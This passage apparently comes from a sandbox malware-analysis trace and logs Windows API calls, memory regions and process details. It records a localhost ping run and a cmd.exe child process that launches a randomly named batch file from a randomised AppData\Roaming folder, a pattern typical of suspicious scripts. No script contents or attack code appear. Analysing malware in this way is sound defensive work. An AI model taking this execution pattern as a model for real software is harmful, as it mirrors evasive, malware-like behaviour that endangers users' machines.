end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8559 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8560 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 8561 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 8601 start_va = 0x1160000 end_va = 0x142efff entry_point = 0x1160000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8602 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8603 start_va = 0x1430000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 8604 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 8605 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 8606 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8607 start_va = 0x250000 end_va = 0x2affff entry_point = 0x0 region_type = private name = 
"private_0x0000000000250000" filename = "" Region: id = 8615 start_va = 0x14e0000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 8616 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 8617 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8618 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8619 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 8620 start_va = 0x15e0000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8674 start_va = 0x1620000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 8675 start_va = 0x1670000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 8676 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 8786 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 8787 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 94 os_tid = 0xe74 [0116.975] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8fe04 | out: 
lpSystemTimeAsFileTime=0x8fe04*(dwLowDateTime=0x83074f20, dwHighDateTime=0x1d440a9)) [0116.975] GetCurrentProcessId () returned 0xe70 [0116.975] GetCurrentThreadId () returned 0xe74 [0116.975] GetTickCount () returned 0x27bf2 [0116.975] QueryPerformanceCounter (in: lpPerformanceCount=0x8fdfc | out: lpPerformanceCount=0x8fdfc*=17376443495) returned 1 [0116.976] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0116.976] __set_app_type (_Type=0x1) [0116.976] __p__fmode () returned 0x76b331f4 [0116.976] __p__commode () returned 0x76b331fc [0116.976] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0116.976] __getmainargs (in: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0116.976] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.076] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.076] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0117.082] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x8f894 | out: phkResult=0x8f894*=0x58) returned 0x0 [0117.082] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x8f888, lpData=0x8f890, lpcbData=0x8f88c*=0x4 | out: lpType=0x8f888*=0x0, lpData=0x8f890*=0x0, lpcbData=0x8f88c*=0x4) returned 0x2 [0117.082] RegCloseKey (hKey=0x58) returned 0x0 [0117.082] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x8f85c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8f884 | out: ppResult=0x8f884*=0x0) returned 11001 [0117.083] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x8f85c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, 
ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8f884 | out: ppResult=0x8f884*=0x3746f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x3747b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3747e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x373a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0117.256] FreeAddrInfoW (pAddrInfo=0x3746f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x3747b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3747e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x373a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0117.256] Icmp6CreateFile () returned 0x378b40 [0117.490] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x374830 [0117.490] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x37ebb0 [0117.490] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0117.490] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x8f884, nSize=0x0, Arguments=0x8f880 | out: lpBuffer="XH7") returned 0x19 [0117.490] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x374858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0117.491] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.491] _write (in: _FileHandle=1, 
_Buf=0x374858*, _MaxCharCount=0x19 | out: _Buf=0x374858*) returned 25 [0117.491] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.491] LocalFree (hMem=0x374858) returned 0x0 [0117.491] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer="XH7") returned 0x18 [0117.491] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x374858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0117.491] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.491] _write (in: _FileHandle=1, _Buf=0x374858*, _MaxCharCount=0x18 | out: _Buf=0x374858*) returned 24 [0117.491] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.491] LocalFree (hMem=0x374858) returned 0x0 [0117.491] SetConsoleCtrlHandler (HandlerRoutine=0x2417ca, Add=1) returned 1 [0117.491] Icmp6SendEcho2 (in: IcmpHandle=0x378b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x8f900, DestinationAddress=0x2455e0, RequestData=0x374830, RequestSize=0x20, RequestOptions=0x8f8b0, ReplyBuffer=0x37ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x37ebb0) returned 0x1 [0117.493] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0117.493] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer=" Q7") returned 0x10 [0117.493] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x375120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0117.493] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.493] _write (in: _FileHandle=1, _Buf=0x375120*, _MaxCharCount=0x10 | 
out: _Buf=0x375120*) returned 16 [0117.493] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.493] LocalFree (hMem=0x375120) returned 0x0 [0117.493] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer="\x10<7") returned 0x9 [0117.493] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x373c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0117.493] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.493] _write (in: _FileHandle=1, _Buf=0x373c10*, _MaxCharCount=0x9 | out: _Buf=0x373c10*) returned 9 [0117.493] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.493] LocalFree (hMem=0x373c10) returned 0x0 [0117.493] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer=" \x8f7") returned 0x2 [0117.493] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x378f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0117.494] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.494] _write (in: _FileHandle=1, _Buf=0x378f20*, _MaxCharCount=0x2 | out: _Buf=0x378f20*) returned 2 [0117.494] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.494] LocalFree (hMem=0x378f20) returned 0x0 [0117.494] Sleep (dwMilliseconds=0x3e8) [0118.653] Icmp6SendEcho2 (in: IcmpHandle=0x378b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x8f900, DestinationAddress=0x2455e0, RequestData=0x374830, RequestSize=0x20, RequestOptions=0x8f8b0, ReplyBuffer=0x37ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x37ebb0) returned 0x1 [0118.670] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", 
pServiceBuffer=0x0) returned 0 [0118.670] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer=" Q7") returned 0x10 [0118.670] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x375120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.670] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.670] _write (in: _FileHandle=1, _Buf=0x375120*, _MaxCharCount=0x10 | out: _Buf=0x375120*) returned 16 [0118.670] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.670] LocalFree (hMem=0x375120) returned 0x0 [0118.670] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer="\x10<7") returned 0x9 [0118.670] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x373c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0118.670] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.670] _write (in: _FileHandle=1, _Buf=0x373c10*, _MaxCharCount=0x9 | out: _Buf=0x373c10*) returned 9 [0118.671] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.671] LocalFree (hMem=0x373c10) returned 0x0 [0118.671] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer=" \x8f7") returned 0x2 [0118.671] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x378f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0118.671] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.671] _write (in: _FileHandle=1, _Buf=0x378f20*, _MaxCharCount=0x2 | out: _Buf=0x378f20*) returned 2 [0118.671] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.671] LocalFree (hMem=0x378f20) returned 0x0 [0118.671] Sleep (dwMilliseconds=0x3e8) [0119.854] Icmp6SendEcho2 (in: IcmpHandle=0x378b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x8f900, 
DestinationAddress=0x2455e0, RequestData=0x374830, RequestSize=0x20, RequestOptions=0x8f8b0, ReplyBuffer=0x37ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x37ebb0) returned 0x1 [0119.966] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.966] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer=" Q7") returned 0x10 [0119.966] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x375120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0119.966] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.966] _write (in: _FileHandle=1, _Buf=0x375120*, _MaxCharCount=0x10 | out: _Buf=0x375120*) returned 16 [0119.966] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.966] LocalFree (hMem=0x375120) returned 0x0 [0119.966] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer="\x10<7") returned 0x9 [0119.966] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x373c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0119.966] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.966] _write (in: _FileHandle=1, _Buf=0x373c10*, _MaxCharCount=0x9 | out: _Buf=0x373c10*) returned 9 [0119.966] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.966] LocalFree (hMem=0x373c10) returned 0x0 [0119.966] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer=" \x8f7") returned 0x2 [0119.967] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x378f20, cchDstLength=0x2 | 
out: lpszDst="\r\n") returned 1 [0119.967] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.967] _write (in: _FileHandle=1, _Buf=0x378f20*, _MaxCharCount=0x2 | out: _Buf=0x378f20*) returned 2 [0119.967] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.967] LocalFree (hMem=0x378f20) returned 0x0 [0119.967] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8f850, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.967] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x8f820, nSize=0x0, Arguments=0x8f81c | out: lpBuffer="\xd0\x14\x38") returned 0x56 [0119.967] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x3814d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0119.967] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.967] _write (in: _FileHandle=1, _Buf=0x3814d0*, _MaxCharCount=0x56 | out: _Buf=0x3814d0*) returned 86 [0119.967] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.967] LocalFree (hMem=0x3814d0) returned 0x0 [0119.967] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x8f830, nSize=0x0, Arguments=0x8f82c | out: lpBuffer="\xe8\x14\x38") returned 0x61 [0119.967] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x3814e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0119.967] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.967] _write 
(in: _FileHandle=1, _Buf=0x3814e8*, _MaxCharCount=0x61 | out: _Buf=0x3814e8*) returned 97 [0119.967] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.967] LocalFree (hMem=0x3814e8) returned 0x0 [0119.967] IcmpCloseHandle (IcmpHandle=0x378b40) returned 1 [0120.052] LocalFree (hMem=0x374830) returned 0x0 [0120.052] LocalFree (hMem=0x37ebb0) returned 0x0 [0120.052] WSACleanup () returned 0 [0120.135] exit (_Code=0) Thread: id = 98 os_tid = 0xe90 Thread: id = 102 os_tid = 0xeb4 Thread: id = 103 os_tid = 0xeb8 Process: id = "59" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xe7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0xdf4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8567 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8568 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8569 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8570 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 8571 start_va = 0x4a9c0000 
end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8572 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8573 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8574 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8575 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8576 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8764 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8765 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 8766 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8767 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 
0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8769 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8770 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8771 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8772 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8773 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8774 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8776 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8777 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8778 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8779 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 8780 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 8781 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 8782 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 8783 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 8784 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8785 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 8788 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8789 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" 
(normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8790 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8791 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 8792 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 96 os_tid = 0xe80 [0117.464] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fefc | out: lpSystemTimeAsFileTime=0x28fefc*(dwLowDateTime=0x83537b20, dwHighDateTime=0x1d440a9)) [0117.464] GetCurrentProcessId () returned 0xe7c [0117.464] GetCurrentThreadId () returned 0xe80 [0117.464] GetTickCount () returned 0x27de5 [0117.464] QueryPerformanceCounter (in: lpPerformanceCount=0x28fef4 | out: lpPerformanceCount=0x28fef4*=17425351039) returned 1 [0117.465] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.465] 